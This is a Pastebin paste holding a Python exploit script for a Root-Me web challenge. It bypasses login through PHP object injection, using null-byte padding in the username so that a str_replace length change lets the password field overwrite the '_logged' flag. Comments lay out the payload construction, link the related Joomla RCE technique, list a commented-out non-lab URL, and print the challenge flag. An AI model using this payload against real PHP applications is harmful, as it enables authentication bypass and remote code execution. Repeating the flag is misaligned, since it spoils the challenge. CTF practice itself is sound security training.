Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- headers = {
- 'Accept-language': 'en-US,en;q=0.9,vi;q=0.8',
- 'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36',
- }
- url = 'http://challenge01.root-me.org/web-serveur/ch65/'
- # url = 'http://majorbounty.com/'
- ## str_replace(search , result_search, input)
- '''vuln
- chr(0) . '*' . chr(0) => len == 3
- '\0\0\0' => len == 6
- str_replace(chr(0) . '*' . chr(0), '\0\0\0', $serialized_value);
- username=guest;pass=guest
- O:4:"User":4:{s:12:"*_username";s:5:"guest";s:12:"*_password";s:5:"guest";s:10:"*_logged";b:0;s:9:"*_email";s:0:"";}
- O:4:"User":4:{s:12:"\0\0\0_username";s:5:"guest";s:12:"\0\0\0_password";s:5:"guest";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
- wrong with php
- => need overflow the logged value....
- O:4:"User":4:{s:12:"\0\0\0_username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:12:"\0\0\0_password";s:XX:"";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
- O:4:"User":4:{s:12:"\0\0\0_username";s:54:" * * * * * * * * * ";s:12:" * _password";s:XX:"";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
- | |
- O:4:"User":4:{s:12:"\0\0\0_username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:12:"\0\0\0_password";s:55:";s:12:"\0\0\0_password";s:0:"";s:10:"\0\0\0_logged";b:1;s:9:"\0\0\0_email";s:0:"";}
- '''
- '''
- (in database)
- s:8:s:"username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:8:"password";s:10:"MYPASSWORD"
- (after read and replace)
- s:8:s:"username";s:54:"NNNNNNNNNNNNNNNNNNNNNNNNNNN";s:8:"password";s:10:"MYPASSWORD"
- (Achieve Object injection):
- s:8:s:"username";s:54:"NNNNNNNNNNNNNNNNNNNNNNNNNNN";s:8:"password";s:10:"MYPA";s:2:"HS":O:15:"ObjectInjection"
- '''
- class Hacker:
- def __init__(self):
- self.url = url
- self.requests_session = requests.session()
- self.headers=headers
- self.proxies = None
- # self.proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}
- def login(self):# \\0\\0
- ## http://majorbounty.com/
- ## joomla rusty rce
- ## https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41
- ## https://github.com/kiks7/rusty_joomla_rce
- ## +'";s:10:"\\0\\0\\0_logged";b:1;s:9:" * _email";s:0:"";}//'
- # data = {'username':'\\0'*27,'password':';s:12:"\\0\\0\\0_password";s:0:"";s:10:"\\0\\0\\0_logged";b:1;s:9:"\\0\\0\\0_email";s:0:"";}//','submit':'login'}
- data = {'username':'\\0'*27,'password':';s:12:"\\0\\0\\0_password";s:0:"";s:10:"\\0\\0\\0_logged";b:1;s:9:"\\0\\0\\0_email";s:0:"";}','submit':'login'}
- # data = {'username':'\\0'*27,'password':';s:12:"\\0\\0\\0_password";s:1:"a";s:10:"\\0\\0\\0_logged";b:1;s:9:"\\0\\0\\0_email";s:44:','submit':'login'}
- resp = self.requests_session.request("POST",url,data=data,headers=headers,proxies=self.proxies,verify=False)
- Cookie = ';'.join([f'{value.name}={value.value}' for value in resp.cookies])#+';user='
- # self.headers['cookie']= Cookie
- def get_cookie(self):
- resp = self.requests_session.request("GET",url,headers=self.headers,proxies=self.proxies,verify=False)
- # if b'you are logged in! congratz, the flag is: ' in resp.content:print(resp.content);input()
- print(resp.content)#;input()
- ## B3Carrefull-w1th_Unseri4l1ze
- if __name__=='__main__':
- hacker = Hacker()
- hacker.login()
- hacker.get_cookie()
Add Comment
Please, Sign In to add comment